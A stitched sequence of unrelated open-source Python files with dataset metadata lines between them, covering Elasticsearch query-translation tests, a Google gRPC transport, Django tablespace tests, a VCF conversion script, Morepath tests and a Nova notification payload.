{'term': {'isPublic': 'true'}}
]
},
{},
True
)
example_fromToTimeQuery_onlyPrivate = (
['org-id-005'],
[
{'creationTime': ['2014-05-18', '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18', 'to': '2014-11-03'}}},
{'term': {'orgUUID': 'org-id-005'}},
{'term': {'isPublic': 'false'}}
]
},
{},
False
)
example_beforeTimeQuery_org = (
['org-id-006'],
[
{'creationTime': [-1, '2014-11-03']}
],
{
'and': [
{'range': {'creationTime': {'to': '2014-11-03'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-006'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
example_afterTimeQuery_org = (
['org-id-007'],
[
{'creationTime': ['2014-05-18', -1]}
],
{
'and': [
{'range': {'creationTime': {'from': '2014-05-18'}}},
{
'or': [
{'term': {'orgUUID': 'org-id-007'}},
{'term': {'isPublic': 'true'}}
]
}
]
},
{},
None
)
@data(example_singleFilter_org,
example_singleFilter_onlyPublic,
example_singleFilter_onlyPrivate,
example_multivaluedFilterQuery_org,
example_multivaluedFilterQuery_onlyPublic,
example_multivaluedFilterQuery_onlyPrivate,
example_multipleFilterQuery_org,
example_multipleFilterQuery_onlyPublic,
example_multipleFilterQuery_onlyPrivate,
example_upperCaseFilterValue_org,
example_upperCaseFilterValue_onlyPublic,
example_upperCaseFilterValue_onlyPrivate,
example_fromToTimeQuery_org,
example_fromToTimeQuery_onlyPublic,
example_fromToTimeQuery_onlyPrivate,
example_beforeTimeQuery_org,
example_afterTimeQuery_org
)
@unpack
def test_filterExtraction_properFilter_filterExtracted(self,
org_uuid_list,
input_filters,
query_filters,
post_filters,
dataset_filtering):
self._assert_filter_extraction_ddt(org_uuid_list,
input_filters,
query_filters,
post_filters,
dataset_filtering)
example_nonListAsFilterValues = (
{'filters': [{'filter name': 'filter value'}]},
['org-id-008'],
True
)
example_nonDictAsFilter = (
{'filters': ['not a dictionary']},
['org-id-09'],
True
)
example_invalidFilterName = (
{'filters': [{'nonexistent_mapping_field': ['some value']}]},
['org-id-010'],
True
)
example_wrongNumberTimeParameters = (
{'filters': [{'creationTime': ['2014-11-03', '2014-11-04', '2014-11-05']}]},
['org-id-011'],
True
)
    @data(example_nonListAsFilterValues,
          example_nonDictAsFilter,
          example_invalidFilterName,
          example_wrongNumberTimeParameters)
    @unpack
    def test_filterExtractionErrors_improperFilter_invalidQueryError(self,
                                                                     invalid_filters,
                                                                     org_uuid_list,
                                                                     dataset_filtering):
        with self.assertRaises(InvalidQueryError):
            self.filter_extractor.extract_filter(
                invalid_filters, org_uuid_list, dataset_filtering, False)
def _assert_filter_extraction_ddt(self,
org_uuid_list,
input_filters,
test_query_filter,
test_post_filter,
dataset_filtering):
"""input_filters -- Dictionary of list of dictionaries in a form:
{'filters': [
{filter_name: [filter_value_1, ...]},
{filter_name2: [filter_value_2_1, ...]}
]}"""
filters = {'filters': input_filters}
output_filter, post_filter = self.filter_extractor.extract_filter(filters, org_uuid_list, dataset_filtering, False)
self.assertDictEqual(test_query_filter, output_filter)
self.assertDictEqual(test_post_filter, post_filter)
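
    # A worked example of the translation exercised above (values taken from
    # example_singleFilter_org): extract_filter turns
    #   {'filters': [{'format': ['csv']}]}
    # plus the org list ['org-id-001'] into a query filter that ORs the org's
    # own datasets with public ones, and a post_filter that ANDs the
    # user-supplied term filters.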
class ElasticSearchBaseQueryCreationTests(TestCase):
MATCH_ALL = {'match_all': {}}
def setUp(self):
self.query_creator = ElasticSearchBaseQueryCreator()
def test_baseQueryCreation_textQueryProvided_baseQueryCreated(self):
TEXT = 'some text query'
proper_base_query = {
'bool': {
'should': [
{
'wildcard': {
'title': {
'value': '*{}*'.format(TEXT),
'boost': 3
}
}
},
{
'match': {
'dataSample': {
'query': TEXT,
'boost': 2
}
}
},
{
'match': {
'sourceUri': {
'query': TEXT,
}
}
}
]
}
}
self.assertDictEqual(
proper_base_query,
self.query_creator.create_base_query({'query': TEXT}))
def test_baseQueryCreation_noQueryElement_matchAllReturned(self):
self.assertDictEqual(
self.MATCH_ALL,
self.query_creator.create_base_query({}))
def test_baseQueryCreation_emptyQuery_matchAllReturned(self):
self.assertDictEqual(
self.MATCH_ALL,
self.query_creator.create_base_query({'query': ''}))
class ElasticSearchQueryTranslationTests(TestCase):
def setUp(self):
self.translator = ElasticSearchQueryTranslator()
self.org_uuid = ['orgid007']
def test_queryTranslation_sizeInQuery_sizeAddedToOutput(self):
SIZE = 123
size_query = json.dumps({'size': SIZE})
translated_query = self.translator.translate(size_query, self.org_uuid, None, False)
self.assertEqual(SIZE, json.loads(translated_query)['size'])
def test_queryTranslation_fromInQuery_fromAddedToOutput(self):
FROM = 345
from_query = json.dumps({'from': FROM})
translated_query = self.translator.translate(from_query, self.org_uuid, True, False)
self.assertEqual(FROM, json.loads(translated_query)['from'])
def test_combiningQueryAndFilter_queryWithFilter_filteredQueryCreated(self):
FAKE_BASE_QUERY = {'yup': 'totally fake'}
FAKE_FILTER = {'uhuh': 'this filter is also fake'}
FAKE_POST_FILTER = {'hello': 'fake filter'}
expected_query = {
'query': {
'filtered': {
'filter': FAKE_FILTER,
'query': FAKE_BASE_QUERY
}
},
'post_filter': FAKE_POST_FILTER,
'aggregations': {
'categories': {
'terms': {
'size': 100,
'field': 'category'
}
},
'formats': {
'terms': {
'field': 'format'
}
}
}
}
output_query = self.translator._combine_query_and_filters(FAKE_BASE_QUERY, FAKE_FILTER, FAKE_POST_FILTER)
self.assertDictEqual(expected_query, output_query)
def test_queryTranslation_queryIsNotJson_invalidQueryError(self):
with self.assertRaises(InvalidQueryError):
self.translator.translate('{"this is not a proper JSON"}', self.org_uuid, None, False)
def test_decodingInputQuery_noneQuery_emptyDictReturned(self):
self.assertDictEqual(
{},
self.translator._get_query_dict(None))
def test_queryTranslation_fullFeaturedQuery_queryTranslated(self):
input_query = {
'query': 'blabla',
'filters': [
{'format': ['csv']}
],
'size': 3,
'from': 14
}
output_query_string = self.translator.translate(json.dumps(input_query), self.org_uuid, True, False)
output_query = json.loads(output_query_string)
self.assertIn('filtered', output_query['query'])
self.assertIn('size', output_query)
self.assertIn('from', output_query)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 1,777,149,651,204,844,000 | 27.775832 | 123 | 0.421581 | false |
googleapis/googleapis-gen | google/cloud/videointelligence/v1p1beta1/videointelligence-v1p1beta1-py/google/cloud/videointelligence_v1p1beta1/services/video_intelligence_service/transports/grpc_asyncio.py | 1 | 12936 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.videointelligence_v1p1beta1.types import video_intelligence
from google.longrunning import operations_pb2 # type: ignore
from .base import VideoIntelligenceServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import VideoIntelligenceServiceGrpcTransport
class VideoIntelligenceServiceGrpcAsyncIOTransport(VideoIntelligenceServiceTransport):
"""gRPC AsyncIO backend transport for VideoIntelligenceService.
Service that implements Google Cloud Video Intelligence API.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'videointelligence.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def annotate_video(self) -> Callable[
[video_intelligence.AnnotateVideoRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the annotate video method over gRPC.
Performs asynchronous video annotation. Progress and results can
be retrieved through the ``google.longrunning.Operations``
interface. ``Operation.metadata`` contains
``AnnotateVideoProgress`` (progress). ``Operation.response``
contains ``AnnotateVideoResponse`` (results).
Returns:
Callable[[~.AnnotateVideoRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'annotate_video' not in self._stubs:
self._stubs['annotate_video'] = self.grpc_channel.unary_unary(
'/google.cloud.videointelligence.v1p1beta1.VideoIntelligenceService/AnnotateVideo',
request_serializer=video_intelligence.AnnotateVideoRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['annotate_video']
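
    # Illustrative use of the stub above (hypothetical snippet, assuming an
    # event loop and valid credentials):
    #
    #   transport = VideoIntelligenceServiceGrpcAsyncIOTransport()
    #   operation = await transport.annotate_video(request)
    #
    # `operation` is a google.longrunning Operation message; progress can then
    # be polled through transport.operations_client.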
__all__ = (
'VideoIntelligenceServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -4,601,164,260,622,470,700 | 45.365591 | 99 | 0.619125 | false |
yephper/django | tests/model_options/test_tablespaces.py | 1 | 5517 | from __future__ import unicode_literals
from django.apps import apps
from django.conf import settings
from django.db import connection
from django.test import TestCase, skipIfDBFeature, skipUnlessDBFeature
from .models.tablespaces import (
Article, ArticleRef, Authors, Reviewers, Scientist, ScientistRef,
)
def sql_for_table(model):
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(model)
return editor.collected_sql[0]
def sql_for_index(model):
return '\n'.join(connection.schema_editor()._model_indexes_sql(model))
# We can't test the DEFAULT_TABLESPACE and DEFAULT_INDEX_TABLESPACE settings
# because they're evaluated when the model class is defined. As a consequence,
# @override_settings doesn't work, and the tests depend on the settings in
# effect when the model classes were defined.
class TablespacesTests(TestCase):
def setUp(self):
# The unmanaged models need to be removed after the test in order to
# prevent bad interactions with the flush operation in other tests.
self._old_models = apps.app_configs['model_options'].models.copy()
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = True
def tearDown(self):
for model in Article, Authors, Reviewers, Scientist:
model._meta.managed = False
apps.app_configs['model_options'].models = self._old_models
apps.all_models['model_options'] = self._old_models
apps.clear_cache()
def assertNumContains(self, haystack, needle, count):
real_count = haystack.count(needle)
self.assertEqual(real_count, count, "Found %d instances of '%s', "
"expected %d" % (real_count, needle, count))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_model(self):
sql = sql_for_table(Scientist).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the index on the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_model(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Scientist),
sql_for_table(ScientistRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_indexed_field(self):
sql = sql_for_table(Article).lower()
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
# 1 for the table + 1 for the primary key + 1 for the index on code
self.assertNumContains(sql, 'tbl_tbsp', 3)
# 1 for the index on reference
self.assertNumContains(sql, 'idx_tbsp', 1)
@skipIfDBFeature('supports_tablespaces')
def test_tablespace_ignored_for_indexed_field(self):
# No tablespace-related SQL
self.assertEqual(sql_for_table(Article),
sql_for_table(ArticleRef))
@skipUnlessDBFeature('supports_tablespaces')
def test_tablespace_for_many_to_many_field(self):
sql = sql_for_table(Authors).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Authors).lower()
# The ManyToManyField declares no db_tablespace, its indexes go to
# the model's tablespace, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 2)
else:
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_table(Reviewers).lower()
# The join table of the ManyToManyField goes to the model's tablespace,
# and its indexes too, unless DEFAULT_INDEX_TABLESPACE is set.
if settings.DEFAULT_INDEX_TABLESPACE:
# 1 for the table
self.assertNumContains(sql, 'tbl_tbsp', 1)
# 1 for the primary key
self.assertNumContains(sql, settings.DEFAULT_INDEX_TABLESPACE, 1)
else:
# 1 for the table + 1 for the index on the primary key
self.assertNumContains(sql, 'tbl_tbsp', 2)
self.assertNumContains(sql, 'idx_tbsp', 0)
sql = sql_for_index(Reviewers).lower()
# The ManyToManyField declares db_tablespace, its indexes go there.
self.assertNumContains(sql, 'tbl_tbsp', 0)
self.assertNumContains(sql, 'idx_tbsp', 2)
| bsd-3-clause | -7,410,635,361,430,300,000 | 41.101563 | 79 | 0.636759 | false |
bioinform/somaticseq | somaticseq/vcfModifier/modify_JointSNVMix2.py | 1 | 3347 | #!/usr/bin/env python3
import argparse
import somaticseq.genomicFileHandler.genomic_file_handlers as genome
def run():
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Variant Call Type, i.e., snp or indel
parser.add_argument('-infile', '--input-vcf', type=str, help='Input VCF file', required=True)
parser.add_argument('-outfile', '--output-vcf', type=str, help='Output VCF file', required=True)
# Parse the arguments:
args = parser.parse_args()
infile = args.input_vcf
outfile = args.output_vcf
return infile, outfile
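
# JointSNVMix2 emits reference depth (RD) and alternate depth (AD) as two
# separate FORMAT fields, while most downstream tools expect a single
# AD=ref,alt field plus a GT genotype. convert() below folds RD into AD and
# derives GT from the variant allele fraction (VAF).
# Typical invocation (illustrative file names):
#   modify_JointSNVMix2.py -infile jsm2.vcf -outfile jsm2.converted.vcf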
def convert(infile, outfile):
    (idx_chrom, idx_pos, idx_id, idx_ref, idx_alt, idx_qual, idx_filter,
     idx_info, idx_format, idx_SM1, idx_SM2) = range(11)
with genome.open_textfile(infile) as vcf, open(outfile, 'w') as vcfout:
line_i = vcf.readline().rstrip()
# VCF header
while line_i.startswith('#'):
if line_i.startswith('##FORMAT=<ID=AD,'):
line_i = '##FORMAT=<ID=AD,Number=.,Type=Integer,Description="Allelic depths for the ref and alt alleles in the order listed">'
vcfout.write( line_i + '\n')
line_i = vcf.readline().rstrip()
while line_i:
item = line_i.split('\t')
format_items = item[idx_format].split(':')
if 'AD' in format_items and 'RD' in format_items:
# NORMAL
idx_ad = format_items.index('AD')
idx_rd = format_items.index('RD')
format_items.pop(idx_rd)
item_normal = item[idx_SM1].split(':')
normal_ad = int(item_normal[idx_ad])
normal_rd = int(item_normal[idx_rd])
try:
vaf = normal_ad / (normal_ad + normal_rd)
except ZeroDivisionError:
vaf = 0
                if vaf > 0.8:
                    normal_gt = '1/1'  # mostly alt reads: homozygous alt
                elif vaf > 0.25:
                    normal_gt = '0/1'  # mixed support: heterozygous
                else:
                    normal_gt = '0/0'  # mostly ref reads: homozygous ref
item_normal[idx_ad] = '{},{}'.format( item_normal[idx_rd] , item_normal[idx_ad] )
item_normal.pop(idx_rd)
item_normal = [normal_gt] + item_normal
# TUMOR
item_tumor = item[idx_SM2].split(':')
tumor_ad = int(item_tumor[idx_ad])
tumor_rd = int(item_tumor[idx_rd])
try:
vaf = tumor_ad / (tumor_ad + tumor_rd)
except ZeroDivisionError:
vaf = 0
                if vaf > 0.8:
                    tumor_gt = '1/1'  # mostly alt reads: homozygous alt
                else:
                    tumor_gt = '0/1'  # any remaining somatic signal: het call
item_tumor[idx_ad] = '{},{}'.format( item_tumor[idx_rd] , item_tumor[idx_ad] )
item_tumor.pop(idx_rd)
item_tumor = [tumor_gt] + item_tumor
# Rewrite
item[idx_format] = 'GT:' + ':'.join(format_items)
item[idx_SM1] = ':'.join(item_normal)
item[idx_SM2] = ':'.join(item_tumor)
line_i = '\t'.join(item)
vcfout.write(line_i+'\n')
line_i = vcf.readline().rstrip()
if __name__ == '__main__':
infile, outfile = run()
convert(infile, outfile)
| bsd-2-clause | 4,254,031,095,837,364,000 | 29.990741 | 142 | 0.501942 | false |
faassen/morepath | morepath/tests/test_publish.py | 1 | 8911 | import dectate
import morepath
from morepath.app import App
from morepath.publish import publish, resolve_response
from morepath.request import Response
from morepath.view import render_json, render_html
from webob.exc import HTTPNotFound, HTTPBadRequest, HTTPFound, HTTPOk
import webob
from webtest import TestApp as Client
import pytest
def get_environ(path, **kw):
return webob.Request.blank(path, **kw).environ
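
# e.g. get_environ('/foo', method='POST') builds a plain WSGI environ dict
# via WebOb, so the tests below can construct requests without a server.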
class Model(object):
pass
def test_view():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return "View!"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
def test_predicates():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return "all"
def post_view(self, request):
return "post"
view_registry = app.config.view_registry
view_registry.register_view(dict(model=Model), view)
view_registry.register_view(
dict(model=Model, request_method='POST'),
post_view)
model = Model()
assert resolve_response(
model, app().request(get_environ(path=''))).body == b'all'
assert (
resolve_response(
model, app().request(get_environ(path='', method='POST'))).body ==
b'post')
def test_notfound():
class app(App):
pass
dectate.commit(app)
request = app().request(get_environ(path=''))
with pytest.raises(HTTPNotFound):
publish(request)
def test_notfound_with_predicates():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return "view"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
request = app().request(get_environ(''))
request.unconsumed = ['foo']
with pytest.raises(HTTPNotFound):
resolve_response(model, request)
def test_response_returned():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return Response('Hello world!')
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
response = resolve_response(model, app().request(get_environ(path='')))
assert response.body == b'Hello world!'
def test_request_view():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return {'hey': 'hey'}
app.config.view_registry.register_view(
dict(model=Model), view,
render=render_json)
request = app().request(get_environ(path=''))
model = Model()
response = resolve_response(model, request)
# when we get the response, the json will be rendered
assert response.body == b'{"hey": "hey"}'
assert response.content_type == 'application/json'
# but we get the original json out when we access the view
assert request.view(model) == {'hey': 'hey'}
def test_request_view_with_predicates():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
return {'hey': 'hey'}
app.config.view_registry.register_view(
dict(model=Model, name='foo'), view,
render=render_json)
request = app().request(get_environ(path=''))
model = Model()
# since the name is set to foo, we get nothing here
assert request.view(model) is None
# we have to pass the name predicate ourselves
assert request.view(model, name='foo') == {'hey': 'hey'}
# the predicate information in the request is ignored when we do a
# manual view lookup using request.view
request = app().request(get_environ(path='foo'))
assert request.view(model) is None
def test_render_html():
class app(App):
pass
dectate.commit(app)
def view(self, request):
return '<p>Hello world!</p>'
app.config.view_registry.register_view(
dict(model=Model), view,
render=render_html)
request = app().request(get_environ(path=''))
model = Model()
response = resolve_response(model, request)
assert response.body == b'<p>Hello world!</p>'
assert response.content_type == 'text/html'
def test_view_raises_http_error():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
raise HTTPBadRequest()
path_registry = app.config.path_registry
path_registry.register_path(
Model, 'foo', None, None, None, None, False, Model)
app.config.view_registry.register_view(dict(model=Model), view)
request = app().request(get_environ(path='foo'))
with pytest.raises(HTTPBadRequest):
publish(request)
def test_view_after():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return "View!"
app.config.view_registry.register_view(
dict(model=Model),
view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') == 'FOO'
def test_view_after_redirect():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return morepath.redirect('http://example.org')
app.config.view_registry.register_view(
dict(model=Model),
view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.status_code == 302
assert result.headers.get('Location') == 'http://example.org'
assert result.headers.get('Foo') == 'FOO'
def test_conditional_view_after():
class app(morepath.App):
pass
dectate.commit(app)
def view(self, request):
if False:
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
return "View!"
app.config.view_registry.register_view(
dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') is None
def test_view_after_non_decorator():
class app(morepath.App):
pass
dectate.commit(app)
def set_header(response):
response.headers.add('Foo', 'FOO')
def view(self, request):
request.after(set_header)
return "View!"
app.config.view_registry.register_view(dict(model=Model), view)
model = Model()
result = resolve_response(model, app().request(get_environ(path='')))
assert result.body == b'View!'
assert result.headers.get('Foo') == 'FOO'
def test_view_after_doesnt_apply_to_exception():
class App(morepath.App):
pass
class Root(object):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise HTTPNotFound()
dectate.commit(App)
c = Client(App())
response = c.get('/', status=404)
assert response.headers.get('Foo') is None
@pytest.mark.parametrize('status_code,exception_class', [
(200, HTTPOk),
(302, HTTPFound)
])
def test_view_after_applies_to_some_exceptions(status_code, exception_class):
class App(morepath.App):
pass
class Root(object):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise exception_class()
dectate.commit(App)
c = Client(App())
response = c.get('/', status=status_code)
assert response.headers.get('Foo') == 'FOO'
def test_view_after_doesnt_apply_to_exception_view():
class App(morepath.App):
pass
class Root(object):
pass
class MyException(Exception):
pass
@App.path(model=Root, path='')
def get_root():
return Root()
@App.view(model=Root)
def view(self, request):
@request.after
def set_header(response):
response.headers.add('Foo', 'FOO')
raise MyException()
@App.view(model=MyException)
def exc_view(self, request):
return "My exception"
dectate.commit(App)
c = Client(App())
response = c.get('/')
assert response.body == b'My exception'
assert response.headers.get('Foo') is None
| bsd-3-clause | -5,141,796,688,623,529,000 | 22.574074 | 78 | 0.622265 | false |
phenoxim/nova | nova/notifications/objects/instance.py | 1 | 25085 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import nova.conf
from nova.notifications.objects import base
from nova.notifications.objects import flavor as flavor_payload
from nova.notifications.objects import keypair as keypair_payload
from nova.objects import base as nova_base
from nova.objects import fields
CONF = nova.conf.CONF
@nova_base.NovaObjectRegistry.register_notification
class InstancePayload(base.NotificationPayloadBase):
SCHEMA = {
'uuid': ('instance', 'uuid'),
'user_id': ('instance', 'user_id'),
'tenant_id': ('instance', 'project_id'),
'reservation_id': ('instance', 'reservation_id'),
'display_name': ('instance', 'display_name'),
'display_description': ('instance', 'display_description'),
'host_name': ('instance', 'hostname'),
'host': ('instance', 'host'),
'node': ('instance', 'node'),
'os_type': ('instance', 'os_type'),
